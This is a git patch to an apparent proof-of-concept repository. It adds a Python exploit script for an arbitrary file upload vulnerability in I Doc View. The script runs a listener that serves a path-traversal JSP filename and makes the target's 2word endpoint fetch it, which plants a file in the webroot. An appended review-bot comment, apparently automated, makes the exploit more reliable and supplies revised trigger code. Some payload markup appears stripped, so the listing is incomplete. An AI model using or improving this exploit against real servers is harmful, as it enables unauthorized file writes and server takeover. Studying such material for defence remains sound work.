From 11cad5b5d80e8bc5ea53f0689615e0b35d22f50b Mon Sep 17 00:00:00 2001
From: wy876 <139549762+wy876@users.noreply.github.com>
Date: Sun, 26 May 2024 20:03:37 +0800
Subject: [PATCH] =?UTF-8?q?Update=20I=20Doc=20View=E4=BB=BB=E6=84=8F?=
 =?UTF-8?q?=E6=96=87=E4=BB=B6=E4=B8=8A=E4=BC=A0=E6=BC=8F=E6=B4=9E.md?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

---
 I Doc View任意文件上传漏洞.md | 68 +++++++++++++++++++++++++++++++++++
 1 file changed, 68 insertions(+)

diff --git a/I Doc View任意文件上传漏洞.md b/I Doc View任意文件上传漏洞.md
index 1660184..ddf8ff0 100644
--- a/I Doc View任意文件上传漏洞.md
+++ b/I Doc View任意文件上传漏洞.md
@@ -23,6 +23,74 @@ poc.html
 ![image](https://github.com/wy876/POC/assets/139549762/73ab1c2a-ad91-40a3-96b0-0ca978fa9abe)
+## 利用脚本
+```python
+import http.server
+import socketserver
+import sys
+import threading
+import requests
+
+visited_pages = {'/': False, '/..\..\..\docview\poc.jsp': False}
+
+class MyHttpRequestHandler(http.server.SimpleHTTPRequestHandler):
+ def do_GET(self):
+ global visited_pages
+ if self.path in visited_pages:
+ visited_pages[self.path] = True
+
+ if all(visited_pages.values()):
+ print("Success! Go to http://{}:{}/poc.jsp".format(remote_ip,remote_port))
+ threading.Thread(target=server.shutdown).start()
+
+ if self.path == '/':
+ self.send_response(200)
+ self.send_header("Content-type", "text/html")
+ self.end_headers()
+ html = f''' +Index Page + + + +'''
+ self.wfile.write(html.encode('utf-8'))
+ elif self.path == '/..\..\..\docview\poc.jsp':
+ self.send_response(200)
+ self.send_header("Content-type", "text/html")
+ self.end_headers()
+ self.wfile.write(b"

Poc Works!

") else:
+ self.send_error(404, "File not found")
+
+ def log_message(self, format, *args):
+ return
+
+def send_request_to_remote():
+ remote_url = f'http://{remote_ip}:{remote_port}/html/2word?url={ip_address}:{port}'
+ try:
+ response = requests.get(remote_url)
+ except Exception as e:
+ pass
+
+if len(sys.argv) < 5:
+ print("Usage: python script.py ")
+ sys.exit(1)
+
+ip_address = sys.argv[1]
+port = int(sys.argv[2])
+remote_ip = sys.argv[3]
+remote_port = sys.argv[4]
+
+def start_server():
+ global server
+ server = socketserver.TCPServer((ip_address, port), MyHttpRequestHandler)
+ server.serve_forever()
+
+server_thread = threading.Thread(target=start_server)
+server_thread.start()
+
+send_request_to_remote()
+```
 ## 漏洞分析
 ```
 https://mp.weixin.qq.com/s/lDqhDnZGXoRyp2IolQ2odg
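Review bot: In `send_request_to_remote` near the end of the hunk, `requests.get(remote_url)` has no timeout and `except Exception as e: pass` swallows every error, so an unreachable or non-vulnerable target leaves the operator with no output while the non-daemon server thread sits in `serve_forever()` forever; the trigger should use `requests.get(remote_url, timeout=10)`, report the failure, and the main thread should join the listener with a timeout instead of hanging. The "Success!" message in `do_GET` fires as soon as the target has fetched both `/` and the traversal path, but a fetch does not prove the file was written, so it would be safer to word it as a callback received and confirm with a follow-up GET to `/poc.jsp` before declaring success. The traversal key `'/..\..\..\docview\poc.jsp'` is a non-raw string containing `\.` and `\d`, which Python keeps literally today but flags as invalid escape sequences (a SyntaxWarning from 3.12); `r'/..\..\..\docview\poc.jsp'` states the intent, and comparing against `urllib.parse.unquote(self.path)` would also cover a target that percent-encodes the backslashes, though whether it does cannot be seen here. The markup inside the `html` f-string, the `poc.jsp` response body and the placeholders in the usage string appear to have been stripped in this rendering of the patch, so the listing as shown is not runnable verbatim.
```python
def send_request_to_remote():
    remote_url = f'http://{remote_ip}:{remote_port}/html/2word?url={ip_address}:{port}'
    try:
        requests.get(remote_url, timeout=10)
    except requests.RequestException as e:
        print(f"Request to {remote_url} failed: {e}")

# … unchanged: argv parsing, start_server …

server_thread = threading.Thread(target=start_server, daemon=True)
server_thread.start()

send_request_to_remote()
server_thread.join(timeout=30)  # wait for the callback, but never hang forever
if server_thread.is_alive():
    print("No callback received; target unreachable, not vulnerable, or cannot reach this host.")
```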